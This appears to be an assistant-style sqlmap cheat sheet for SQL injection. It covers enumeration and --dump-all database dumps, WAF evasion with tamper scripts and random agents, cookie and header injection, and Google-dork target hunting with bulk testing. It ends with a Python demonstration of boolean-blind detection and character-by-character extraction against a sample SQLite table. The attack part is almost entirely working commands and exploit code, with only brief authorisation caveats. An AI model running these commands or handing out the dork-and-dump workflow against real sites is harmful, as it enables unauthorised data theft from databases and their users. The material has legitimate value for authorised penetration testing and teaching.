1. Install Sqlmap

# Linux (Kali/Parrot)
sudo apt update && sudo apt install sqlmap

# Or clone from GitHub (then run it as python3 sqlmap.py from that directory)
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

2. Basic Usage

# Simple scan of a GET parameter
sqlmap -u "http://target.com/page.php?id=1"

# Scan a POST request (save the raw HTTP request to req.txt: request line, headers, blank line, body)
sqlmap -r req.txt

# Scan a request saved from Burp Suite (right-click > Copy to file); it is the same -r flag.
# Put a * inside the saved request to force sqlmap to test that exact spot.
sqlmap -r burp_request.txt

3. Important Parameters

-u URL          # Target URL
--dbs           # Enumerate database names
-D DB_NAME      # Select a database
--tables        # Enumerate tables
-T TABLE_NAME   # Select a table
--columns       # Enumerate columns
--dump          # Dump table contents
--dump-all      # Dump every database on the server
--batch         # Non-interactive (takes the default answer to every prompt)
--risk=3        # Risk level (1-3); 3 adds OR-based payloads that can modify data when the injection sits in an UPDATE/DELETE
--level=5       # Test level (1-5); cookies are tested from 2, User-Agent/Referer from 3, Host only at 5
--tamper=space2comment  # Tamper script; only helps against filters that actually block what it rewrites

4. Worked Example

Step 1: Scan & Detect

sqlmap -u "http://target.com/news.php?id=1" --batch --dbs

Example output:

available databases [2]:
[*] information_schema
[*] webapp_db

Step 2: Enum Tables

sqlmap -u "http://target.com/news.php?id=1" -D webapp_db --tables

Example output:

Database: webapp_db
[5 tables]
+----------+
| users    |
| admin    |
| orders   |
| products |
| logs     |
+----------+

Step 3: Dump Data

# Dump one table
sqlmap -u "http://target.com/news.php?id=1" -D webapp_db -T users --dump

# Dump everything: --dump-all walks every database on the server (add --exclude-sysdbs to skip system schemas);
# to dump only webapp_db use -D webapp_db --dump without -T
sqlmap -u "http://target.com/news.php?id=1" -D webapp_db --dump-all

5. Advanced Techniques

- Bypass WAF

sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment,between \
--random-agent \
--delay=2 \
--timeout=30
# Tamper scripts are target-specific: find out which characters the WAF blocks before picking them.
# --delay is seconds between requests, --timeout is seconds to wait for a response.

- POST Request

sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=pass" \
--dump

- Cookie Injection

sqlmap -u "http://target.com/page.php" \
--cookie="PHPSESSID=abc123; user_id=1" \
--level=2 \
--dump
# Cookie values are only tested at --level=2 or higher; alternatively name the parameter with -p user_id.

- Custom Headers

sqlmap -u "http://target.com/" \
--headers="X-Forwarded-For: 127.0.0.1\nUser-Agent: Mozilla"
# Header values are only tested at --level=3 or higher, or mark the spot explicitly
# with the * injection marker (e.g. X-Forwarded-For: 127.0.0.1*).

6. Google Dorking + Sqlmap

# Find candidate pages (only test systems you are authorised to assess)
google dorks: "inurl:news.php?id="

# Crawl one site up to depth 3 and test every parameter found; this covers one host, not a list.
# For bulk testing feed a file of target URLs with -m, or pass the dork itself with -g.
sqlmap -u "http://target.com/news.php?id=1" --crawl=3

7. Save Results

# Without --output-dir, sqlmap writes its session, log and dumped CSVs under its own output folder
# in your home directory (the path is printed at the end of each run)
sqlmap -u "http://target.com/page.php?id=1" \
--dump \
--output-dir=/path/to/results/

8. Pro Tips

# Fast scan (level 1 / risk 1 are the defaults)
sqlmap -u URL --batch --level=1 --risk=1

# Deep scan (10 is the thread ceiling; risk 3 can modify data, so not against production without approval)
sqlmap -u URL --batch --level=5 --risk=3 --threads=10

# Restrict to one technique (B=boolean blind, E=error-based, U=union, S=stacked, T=time blind, Q=inline)
sqlmap -u URL --technique=B

# Update sqlmap
cd sqlmap-dev && git pull

Pentest workflow:

  1. Recon → find parameters with Burp/ZAP
  2. Manual test → ' or 1=1 -- (MySQL needs a space after --, so send it as "' or 1=1 -- ")
  3. sqlmap detection → -u URL --dbs
  4. Enumerate → -D db --tables --columns
  5. Dump → -T table --dump, or --dump-all
  6. Report → screenshots + sample data
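To see what steps 2, 3 and 5 of the workflow actually rely on, here is an added Python example (not from the original cheat sheet and not sqlmap's own code). It models the boolean-based blind check behind --technique=B and the per-character extraction that a blind --dump performs, against a constructed in-memory SQLite stand-in for news.php?id=. The news table, its rows, the two page handlers and every function name are assumptions made for this demo; real sqlmap tries many payload shapes and compares pages by similarity ratio instead of exact equality.

```python
"""Added example, not part of the original cheat sheet and not sqlmap code:
a minimal model of the boolean-based blind check sqlmap runs with
--technique=B, and of the per-character extraction behind --dump, run
against a constructed in-memory SQLite stand-in for news.php?id=.

Assumptions: the news table, its rows, the two page handlers and all
function names are invented for this demo.
"""
import sqlite3
import string

# Constructed sample data standing in for the target's news table.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
_conn.executemany(
    "INSERT INTO news VALUES (?, ?)",
    [(1, "Welcome"), (2, "Maintenance window"), (3, "Release notes")],
)
_conn.commit()

# Characters tried during blind extraction; the single quote is left out so
# the payload never breaks its own string literal.
CHARSET = string.ascii_letters + string.digits + " _-.@"


def vulnerable_page(id_param: str) -> str:
    """news.php?id=<value> built by string concatenation: the injectable version."""
    sql = f"SELECT title FROM news WHERE id = {id_param}"
    try:
        rows = _conn.execute(sql).fetchall()
    except sqlite3.Error:
        return "<h1>Database error</h1>"
    return "".join(f"<h2>{t}</h2>" for (t,) in rows) or "<p>No article found</p>"


def hardened_page(id_param: str) -> str:
    """Same endpoint with a parameterised query: the payload is data, not SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return "<p>No article found</p>"
    rows = _conn.execute("SELECT title FROM news WHERE id = ?", (id_value,)).fetchall()
    return "".join(f"<h2>{t}</h2>" for (t,) in rows) or "<p>No article found</p>"


def boolean_blind_check(page, original: str) -> bool:
    """True when the parameter behaves like a boolean-based blind injection point.

    A TRUE condition must leave the page unchanged and a FALSE condition
    must change it. A parameter that ignores (or rejects) the payload gives
    the same page for both conditions and is reported as not injectable.
    """
    baseline = page(original)
    true_resp = page(f"{original} AND 1=1")
    false_resp = page(f"{original} AND 1=2")
    return true_resp == baseline and false_resp != baseline


def blind_extract(page, original: str, expr: str, max_len: int = 64) -> str:
    """Recover the value of SQL expression `expr` one character at a time.

    This is what a blind --dump does under the hood: every yes/no question
    is one HTTP request, so dumping a table costs thousands of requests.
    """
    baseline = page(original)

    def ask(condition: str) -> bool:
        return page(f"{original} AND {condition}") == baseline

    length = None
    for n in range(max_len + 1):
        if ask(f"length(({expr})) = {n}"):
            length = n
            break
    if length is None:
        raise ValueError("value longer than max_len or parameter not injectable")

    result = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if ask(f"substr(({expr}), {pos}, 1) = '{ch}'"):
                result += ch
                break
        else:
            result += "?"  # character outside CHARSET
    return result


if __name__ == "__main__":
    print("vulnerable injectable:", boolean_blind_check(vulnerable_page, "1"))
    print("hardened injectable:  ", boolean_blind_check(hardened_page, "1"))
    print("extracted:", blind_extract(vulnerable_page, "1",
                                      "SELECT title FROM news WHERE id = 3"))
```

Run it and the vulnerable handler is flagged while the parameterised one is not; blind_extract then pulls the id=3 title back through nothing but true/false page differences, which is why a blind dump with --threads=10 still takes a long time and why --technique=B is the right choice when union and error-based techniques fail.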

Practice on DVWA or bWAPP first, boss! Anything unclear? Just ask 🔥